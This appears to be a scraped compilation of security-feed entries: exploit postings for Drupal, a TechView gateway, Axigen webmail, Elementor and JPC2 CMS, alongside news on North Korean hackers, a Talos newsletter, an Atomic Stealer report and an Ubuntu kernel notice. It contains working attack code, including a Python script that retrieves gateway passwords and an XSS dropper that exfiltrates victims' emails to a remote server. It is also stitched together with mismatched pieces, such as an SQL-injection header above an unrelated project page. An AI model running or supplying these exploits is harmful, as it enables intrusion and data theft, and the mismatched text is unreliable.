Drupal version 10.1.2 appears to suffer from web cache poisoning due to a server-side request forgery vulnerability.

    ## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction## Author: nu11secur1ty## Date: 08/30/2023## Vendor: https://www.drupal.org/## Software: https://www.drupal.org/download## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http## Description:It is possible to induce the application to perform server-side HTTPrequests to arbitrary domains.The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com wassubmitted in the HTTP Host header.The application performed an HTTP request to the specified domain. Forthe second test, the attacker stored a responseon the server with malicious content. This can be bad for a lot ofusers of this system if the attacker spreads a malicious URLand sends it by email etc. By using a redirect exploit.STATUS: HIGH-Vulnerability[+]Exploit:```GETGET /drupal/web/?psp4hw87ev=1 HTTP/1.1Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.comAccept-Encoding: gzip, deflate, psp4hw87evAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,text/psp4hw87evAccept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36 psp4hw87evConnection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Origin: https://psp4hw87ev.pwnedhost.com```[+]Response from Burpcollaborator server:```HTTPHTTP/1.1 200 OKServer: Burp Collaborator https://burpcollaborator.net/X-Collaborator-Version: 4Content-Type: text/htmlContent-Length: 62<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>```[+]Response from Attacker server```HTTP192.168.100.45 - - [30/Aug/2023 05:52:56] "GET/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)## Time spend:03:35:00

Drupal 10.1.2 Web Cache Poisoning

TECHView LA5570 Wireless Gateway version 1.0.19_T53 suffers from directory traversal, privilege escalation, and information disclosure vulnerabilities.

    # Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities# Google Dork: N/A# Date: 25/08/2023# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570# Software Link: N/A# Version: 1.0.19_T53# Tested on: MACOS/Linux# CVE : CVE-2023-34723# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725#!/opt/homebrew/bin/python3import requestsimport sysfrom time import sleepfrom urllib3.exceptions import InsecureRequestWarningfrom colorama import initfrom colorama import Fore, Back, Styleimport reimport osimport ipaddressrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)def banner():    if os.name == 'posix':        clr_cmd = ('clear')    elif os.name == 'nt':        clr_cmd = ('cls')    os.system(clr_cmd)    print ("[+]****************************************************[+]")    print (" | Author      : The Security Team                      |")    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")    print (" | Usage       : "+sys.argv[0]+" <target>              |")       print ("[+]****************************************************[+]")def usage():    print (f"Usage: {sys.argv[0]} <target>")def main(target):    domain = "http://"+target+"/config/system.conf"    try:        url = domain.strip()        r = requests.get(url, verify=False, timeout=3)        print ("[+] Retrieving credentials", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        if ("system_password" in r.text):            data =  (r.text.split("\n"))            print (f"\n{data[1]}")        else:            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)    except TimeoutError:        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)    except KeyboardInterrupt:        return    except requests.exceptions.Timeout:        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)        return        if __name__ == '__main__':    if len(sys.argv)>1:        banner()        target = sys.argv[1]        try:            validate = ipaddress.ip_address(target)            if (validate):                main (target)        except ValueError as e:            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)     else:        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)

TECHView LA5570 Wireless Gateway 1.0.19_T53 Traversal / Privilege Escalation

Axigen versions 10.5.0–4370c946 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS# Google Dork: inurl:passwordexpired=yes# Date: 2023-08-21# Exploit Author: AmirZargham# Vendor Homepage: https://www.axigen.com/# Software Link: https://www.axigen.com/mail-server/download/# Version: (10.5.0–4370c946) and older version of Axigen WebMail# Tested on: firefox,chrome# CVE: CVE-2022-31470ExploitWe use the second Reflected XSS to exploit this vulnerability, create amalicious link, and steal user emails.Dropper codeThis dropper code, loads and executes JavaScript exploit code from a remoteserver.');x = document.createElement('script');x.src = 'https://example.com/exploit.js';window.addEventListener('DOMContentLoaded',function y(){  document.body.appendChild(x)})//Encoded form/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//Exploit codexhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = newXMLHttpRequest();oob_server = 'https://example.com/';var script_tag = document.createElement('script');xhr1.open('GET', '/', true);xhr1.onreadystatechange = () => {    if (xhr1.readyState === XMLHttpRequest.DONE) {        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,true);        xhr2.setRequestHeader('Content-Type', 'application/json');        xhr2.onreadystatechange = () => {            if (xhr2.readyState === XMLHttpRequest.DONE) {                if (xhr2.status === 401){                    script_tag.src =`${oob_server}?status=session_expired&domain=${document.domain}`;                    document.body.appendChild(script_tag);                } else {                    resp = xhr2.responseText;                    folderId = JSON.parse(resp)["mails"][0]["folderId"];                    xhr3.open('GET',`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);                    xhr3.onreadystatechange = () => {                        if (xhr3.readyState === XMLHttpRequest.DONE) {                            emails = xhr3.responseText;                            script_tag.src =`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;                            document.body.appendChild(script_tag);                        }                    };                    xhr3.send();                }            }        };        var body = JSON.stringify({isUnread: false});        xhr2.send(body);    }};xhr1.send();Combining dropper and exploitYou can host the exploit code somewhere and then address it in the droppercode.

Axigen 10.5.0–4370c946 Cross Site Scripting

WordPress Elementor plugin versions prior to 3.5.5 suffer from an iframe injection vulnerability.

    # Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection# Date: 28.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://elementor.com/# Version: < 3.5.5# Tested on: Google and Firefox latest version# CVE : CVE-2022-4953# 1. DescriptionThe plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.# 2. Proof of Concept (PoC)Proof of Concept:https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

WordPress Elementor Iframe Injection

Threat actors associated with North Korea are continuing to target the cybersecurity community using a zero-day bug in unspecified software over the past several weeks to infiltrate their machines.
The findings come from Google’s Threat Analysis Group (TAG), which found the adversary setting up fake accounts on social media platforms like X (formerly Twitter) and Mastodon to forge relationships

Threat actors associated with North Korea are continuing to target the cybersecurity community using a zero-day bug in unspecified software over the past several weeks to infiltrate their machines.

The findings come from Google's Threat Analysis Group (TAG), which found the adversary setting up fake accounts on social media platforms like X (formerly Twitter) and Mastodon to forge relationships with potential targets and build trust.

"In one case, they carried on a months-long conversation, attempting to collaborate with a security researcher on topics of mutual interest," security researchers Clement Lecigne and Maddie Stone said. "After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp, or Wire."

The social engineering exercise ultimately paves the way for a malicious file containing at least one zero-day in a popular software package. The vulnerability is currently in the process of being fixed.

The payload, for its part, performs a number of anti-virtual machine (VM) checks and transmits the collected information, along with a screenshot, back to an attacker-controlled server.

A search on X shows that the now-suspended account has been active since at least October 2022, with the actor releasing proof-of-concept (PoC) exploit code for high-severity privilege escalation flaws in the Windows Kernel such as CVE-2021-34514 and CVE-2022-21881.

This is not the first time North Korean actors have leveraged collaboration-themed lures to infect victims. In July 2023, GitHub disclosed details of an npm campaign in which adversaries tracked as TraderTraitor (aka Jade Sleet) used fake personas to target the cybersecurity sector, among others.

"After establishing contact with a target, the threat actor invites the target to collaborate on a GitHub repository and convinces the target to clone and execute its contents," the Microsoft-owned company said at the time.

Google TAG said it also found a standalone Windows tool named "GetSymbol" developed by the attackers and hosted on GitHub as a potential secondary infection vector. It has been forked 23 times to date.

The rigged software, published on GitHub way back in September 2022 and now taken down, offers a means to "download debugging symbols from Microsoft, Google, Mozilla, and Citrix symbol servers for reverse engineers."

But it also comes with the ability to download and execute arbitrary code from a command-and-control (C2) domain.

The disclosure comes as the AhnLab Security Emergency Response Center (ASEC) revealed that North Korean nation-state actor known as ScarCruft is leveraging LNK file lures in phishing emails to deliver a backdoor capable of harvesting sensitive data and executing malicious instructions.

It also follows new findings from Microsoft that "multiple North Korean threat actors have recently targeted the Russian government and defense industry – likely for intelligence collection – while simultaneously providing material support for Russia in its war on Ukraine."

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

The targeting of Russian defense companies was also highlighted by SentinelOne last month, which revealed that both Lazarus Group (aka Diamond Sleet or Labyrinth Chollima) and ScarCruft (aka Ricochet Chollima or Ruby Sleet) breached NPO Mashinostroyeniya, a Russian missile engineering firm, to facilitate intelligence gathering.

The two actors have also been observed infiltrating arms manufacturing companies based in Germany and Israel from November 2022 to January 2023, not to mention compromising an aerospace research institute in Russia as well as defense companies in Brazil, Czechia, Finland, Italy, Norway, and Poland since the start of the year.

"This suggests that the North Korean government is assigning multiple threat actor groups at once to meet high-priority collection requirements to improve the country's military capabilities," the tech giant said.

Earlier this week, the U.S. Federal Bureau of Investigation (FBI) implicated the Lazarus Group as behind the theft of 41 million in virtual currency from Stake.com, an online casino and betting platform.

It said that the stolen funds associated with the Ethereum, Binance Smart Chain (BSC), and Polygon networks from Stake.com have been moved to 33 different wallets on or about September 4, 2023.

"North Korean cyber threat actors pursue cyber operations aiming to (1) collect intelligence on the activities of the state's perceived adversaries: South Korea, the United States, and Japan, (2) collect intelligence on other countries' military capabilities to improve their own, and (3) collect cryptocurrency funds for the state," Microsoft said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Exploit Zero-Day Bug to Target Cybersecurity Researchers

Zoo Management System v1.0 was discovered to contain multiple SQL injection vulnerabilities in the Admin sign-in page via the username and password fields.

**Student Management System using PHP and MySQL**

**Student Management System Introduction**

Student management system using PHP and MySQL is a web-based application. Student Management Project is software that is helpful for students as well as the school authorities. In the current system, all the activities are done manually. It is very time-consuming and costly. Our online Student Management System in PHP deals with the various activities related to the students.

**Project Requirements**

Project Name

Student Management System in php

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Student Management System Project Modules**

The two main users involved in this system are

1.  User(i.e. Students)
2.  Admin

**Admin:**

1.  **Dashboard**: In this section, admin can see all detail in brief like Total Classes, Total Students, Total Class Notices and Total Public Notices.
2.  **Class**: In this section, admin can manage class (Add/Update/Delete).
3.  **Students**: In this section, admin can manage the students (Add/Update/Delete).
4.  **Notices:** In this section, the admin can manage notices (Add/Update/Delete).
5.  **Public Notices:** In this section, the admin can manage public notices.
6.  **Pages:** In this section admin, can manage about us and contact us page of administration
7.  **Search:** In this section admin, can search students by their student id.
8.  **Reports:** In this section admin, can view how much students has been register  in particular period.
9.  Admin can also update his profile, change the password and recover the password.

**User (Students):**

1.  **Dashboard**: It is welcome page for students.
2.  **View Notices**: In this section, user can view notices which are announced by administrator.
3.  Student can also view his profile, change the password and recover the password.

**User (Non-Register):**

1.  **Home**: It is welcome page for user.
2.  **About**: User can view about us page.
3.  **Contact:** User can view contact us page.

****Project Output Screens****

**Home Page**

**Student/User Login**

**Admin Dashboard**

**Add Students**

**How to run the Student Management Project using PHP and MySQL**

1\. Download the project zip file

2\. Extract the file and copy studentms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/Html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name  studentmsdb

6\. Import studentmsdb.sql file(given inside the zip package in SQL file folder)

7\. Run the script http://localhost/studentms

**Admin Credential**  
**Username:** admin  
**Password:** Test@123

**Credential for Student / User panel :**

Username: anujk3  
Password: Test@123

Or Register a new Student/User.

**Project Demo**

Download Source Code Student MS

Size: 20.6 MB

Version: V 1

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2023-41615: Student Management System in PHP | Student Management Project in PHP

Cybercriminals are abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware on infected machines, new Cisco Talos research shows.

Thursday, September 7, 2023 14:09

Welcome to this week’s edition of the Threat Source newsletter.

Up until last week, I had never considered the timing of a scam to be important. I’m so used to just swiping away emails or text messages at random times during the day that I’d never considered what would happen if an adversary happened to get me at _just_ the right time.

That’s what happened to my wife last week.

We were on vacation, and I was away for a few hours at lunch with my friends while she and the other spouses stayed back with our children to hang out at the pool for a bit.

She received a text message from an unknown number asking her to confirm a Zelle payment to someone she had never heard of for a not-insignificant amount of money. Not even a minute later, she received a call from the same number from someone claiming to represent our bank asking if the transaction was fraudulent and if could she provide some personal information to verify the transaction or cancel it.

In most cases, she probably would have put them on hold and Googled the number to see if it was legitimate or logged into her online account to view her recent transactions. The problem was this scammer had hit her at the worst possible time. It was right in the middle of a diaper change for our 10-month-old daughter, and she was trying to change our daughter out of a wet bathing suit and stop her from crying because they were just a few minutes away from naptime.

Already in a panic (and not to mention exhausted from the heat at the beach), she answered the phone call and listened to the person on the other line, growing increasingly frustrated and just wanting to end the phone call as quickly as possible so she could return her attention to our daughter while trying to make sure we weren’t legitimately about to be scammed out of money.

Our friends thankfully intervened after she put the phone on speaker, and they all noticed some similar red flags and she ended the conversation before giving away any significant information the scammer didn’t already seem to have.

But it did get me thinking about how the timing and urgency of these scams can make such a difference. I can’t say the same thing wouldn’t have happened to me had I been in the middle of a diaper change and having to worry about something as stressful as money. Or what if they had caught my wife while she was in the car and didn’t have the internet or friends at her disposal?

This timing was purely blind luck on the attacker’s part, but it nonetheless almost worked out for them. I’m not trying to throw my wife under the bus or anything, I just wanted to use this story to illustrate that anyone can be a target of these types of scams at any time, and the scammers don’t care if you have to change a dirty diaper or not.

**The one big thing**

Cybercriminals are abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware on infected machines, new Cisco Talos research shows. The campaign, active since late last year, appears to primarily target graphic designers or any other engineers who may rely on 3-D modeling software who speak French. Cybercriminals are likely targeting these users because this type of software requires large GPUs, which also happen to be extremely useful when mining cryptocurrency.

**Why do I care?**

This campaign specifically targets business verticals such as architecture, engineering, construction, manufacturing and entertainment, though anyone using a computer of any type could be a target of a cryptocurrency mining malware. The attackers’ use of Advanced Installer also allows the backdoors used in this campaign to often slip by undetected.

**So now what?**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. And if you’re ever curious about what your GPU is up to, use Task Manager on Windows or Activity Monitor on Mac to check out what your machine’s computing power is going toward. There are also specific Cisco Secure protections available that we outlined in Talos’ blog on this campaign.

**Top security headlines of the week**

With students around the globe going back to school over the past few weeks, **cyber attacks against the education sector are back in the spotlight.** This time of year is often a popular time for attackers to strike against schools, colleges and universities because their systems are under the most stress at the start of a new school year. Private security companies in the U.K. issued public warnings to school leaders that their systems are likely not prepared for a sophisticated threat actor, days after a school in northern London had to delay its start date by six days due to a cyber attack. More than 100,000 people may have also had their personal information stolen as the result of a data breach against Minneapolis’ school district, with the Medusa ransomware group claiming it was behind the attack. Although the intrusion took place in February, the district last week sent home letters to students and parents describing the results of an investigation into the breach. (The Record by Recorded Future, Yahoo! News, BBC)

The FBI announced last week that it **successfully dismantled the infamous Qakbot botnet.** Known as “Operation: Duck Hunt,” the takedown involved the FBI deploying an in-house uninstaller tool to Qakbot-infected devices. International law enforcement also seized Qakbot infrastructure located in the U.S. and across Europe. In the announcement of the takedown, U.S. officials blamed Qakbot for more than 40 ransomware attacks over the past 18 months, generating $58 million in ransom payments. Authorities also seized millions of dollars’ worth of cryptocurrency from Qakbot, which they are working to return to the original owners. However, security researchers are warning that the operation likely won’t be gone forever, as the operators and creators of Qakbot apparently still remain at large, and these types of botnets typically find ways to be reborn after takedowns. (BankInfoSecurity, TechCrunch)

**Researchers and reporters at “Wired” have unmasked one of the leaders of the Trickbot threat actor.** A 41-year-old is allegedly behind the online monikers “Bentley” and “Manuel” who are known as being the creators of Trickbot. The investigation also uncovered potential connections between Trickbot and the Russian government and other cybercriminal games. Thousands of messages in a Trickbot group message were leaked last year, which included sensitive information researchers have been able to use to unmask some of the group’s operations. A single CEO-like figure also appears to be at the helm of Trickbot and the Conti ransomware gang, receiving daily updates on the groups’ operations, the messages show. (Wired, NISOS)

**Can’t get enough Talos?**

*   Talos Takes Ep. #153: You're never going to believe this, but Lazarus Group is back again
*   Vulnerability Roundup: Eight vulnerabilities in Open Automation Software Platform could lead to information disclosure, improper authentication
*   Hackers modify open-source ‘SapphireStealer’ malware, leading to multiple variants
*   Cisco Talos Research: New Lazarus Group Attack Malware Campaign Hits UK & US Businesses
*   Healthcare remains the top target of hackers, reports Cisco

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

> Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit.

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827  
**MD5:** bf357485cf123a72a46cc896a5c4b62d  
**Typical Filename:** bf357485cf123a72a46cc896a5c4b62d.virus  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5219579ee.in03.Talos

**SHA 256:** 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab  
**MD5:** 4c648967aeac81b18b53a3cb357120f4  
**Typical Filename:** iptjqbjtb.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::1201

**SHA 256:** 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa  
**MD5:** 9403425a34e0c78a919681a09e5c16da  
**Typical Filename:** vincpsarzh.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

A secondhand account of the worst possible timing for a scammer to strike

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called Atomic Stealer (or AMOS), indicating that it’s being actively maintained by its author.
An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering

Malvertising / Endpoint Security

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called **Atomic Stealer** (or AMOS), indicating that it's being actively maintained by its author.

An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering features were detected in the wild, targeting gamers and cryptocurrency users.

Malvertising via Google Ads has been observed as the primary distribution vector in which users searching for popular software, legitimate or cracked, on search engines are shown bogus ads that direct to websites hosting rogue installers.

The latest campaign involves the use of a fraudulent website for TradingView, prominently featuring three buttons to download the software for Windows, macOS, and Linux operating systems.

"Both the Windows and Linux buttons point to an MSIX installer hosted on Discord that drops NetSupport RAT," Jérôme Segura, director of threat intelligence at Malwarebytes, said.

The macOS payload ("TradingView.dmg") is a new version of Atomic Stealer released at the end of June, which is bundled in an ad-hoc signed app that, once executed, prompts users to enter their password on a fake prompt and harvest files as well as data stored in iCloud Keychain and web browsers.

"Atomic stealer also targets both Chrome and Firefox browsers and has an extensive hardcoded list of crypto-related browser extensions to attack," SentinelOne previously noted in May 2023. Select variants have also targeted Coinomi wallets.

The ultimate goal of the attacker is to bypass Gatekeeper protections in macOS and exfiltrate the stolen information to a server under their control.

The development comes as macOS is increasingly becoming a viable target of malware attacks, with a number of macOS-specific info stealers appearing for sale in crimeware forums in recent months to take advantage of the wide availability of Apple systems in organizations.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

"While Mac malware really does exist, it tends to be less detected than its Windows counterpart," Segura said. "The developer or seller for AMOS actually made it a selling point that their toolkit is capable of evading detection."

Atomic Stealer is not the only malware propagated via malvertising and search engine optimization (SEO) poisoning campaigns, as evidence has emerged of DarkGate (aka MehCrypter) latching onto the same delivery mechanism.

New versions of DarkGate have since been employed in attacks mounted by threat actors employing tactics similar to that of Scattered Spider, Aon's Stroz Friedberg Incident Response Services said last month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Mac Users Beware: Malvertising Campaign Spreads Atomic Stealer macOS Malware

Ubuntu Security Notice 6351-1 - It was discovered that the NTFS file system implementation in the Linux kernel did not properly validate MFT flags in certain situations. An attacker could use this to construct a malicious NTFS image that, when mounted and operated on, could cause a denial of service. Zi Fan Tan discovered that the binder IPC implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6351-1September 06, 2023linux-gke, linux-gkeop vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systemsDetails:It was discovered that the NTFS file system implementation in the Linuxkernel did not properly validate MFT flags in certain situations. Anattacker could use this to construct a malicious NTFS image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2022-48425)Zi Fan Tan discovered that the binder IPC implementation in the Linuxkernel contained a use-after-free vulnerability. A local attacker could usethis to cause a denial of service (system crash) or possibly executearbitrary code. (CVE-2023-21255)It was discovered that a race condition existed in the f2fs file system inthe Linux kernel, leading to a null pointer dereference vulnerability. Anattacker could use this to construct a malicious f2fs image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2023-2898)It was discovered that the DVB Core driver in the Linux kernel did notproperly handle locking events in certain situations. A local attackercould use this to cause a denial of service (kernel deadlock).(CVE-2023-31084)Yang Lan discovered that the GFS2 file system implementation in the Linuxkernel could attempt to dereference a null pointer in some situations. Anattacker could use this to construct a malicious GFS2 image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2023-3212)It was discovered that the KSMBD implementation in the Linux kernel did notproperly validate buffer sizes in certain operations, leading to an out-of-bounds read vulnerability. A remote attacker could use this to cause adenial of service (system crash) or possibly expose sensitive information.(CVE-2023-38426, CVE-2023-38428)It was discovered that the KSMBD implementation in the Linux kernel did notproperly calculate the size of certain buffers. A remote attacker could usethis to cause a denial of service (system crash) or possibly executearbitrary code. (CVE-2023-38429)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1027-gkeop   5.15.0-1027.32   linux-image-5.15.0-1041-gke     5.15.0-1041.46   linux-image-gke                 5.15.0.1041.40   linux-image-gke-5.15            5.15.0.1041.40   linux-image-gkeop               5.15.0.1027.26   linux-image-gkeop-5.15          5.15.0.1027.26After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6351-1   CVE-2022-48425, CVE-2023-21255, CVE-2023-2898, CVE-2023-31084,   CVE-2023-3212, CVE-2023-38426, CVE-2023-38428, CVE-2023-38429Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1041.46   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1027.32

Ubuntu Security Notice USN-6351-1

JPC2 CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ======================================================================================================================================| # Title     : JPC2 CMS v1.0 Sql injection Vulnerability                                                                            || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              || # Vendor    : https://www.facebook.com/JPC2GroupWeb                                                                                |  | # Dork      : "Web design and development JPC2 Group Web"                                                                          |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  inject here : http://127.0.0.1/wwwnpmlexcom/en/pagina.php?idcate=13[+]  Panel       : http://127.0.0.1/wwwnpmlexcom/en/administrador/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#google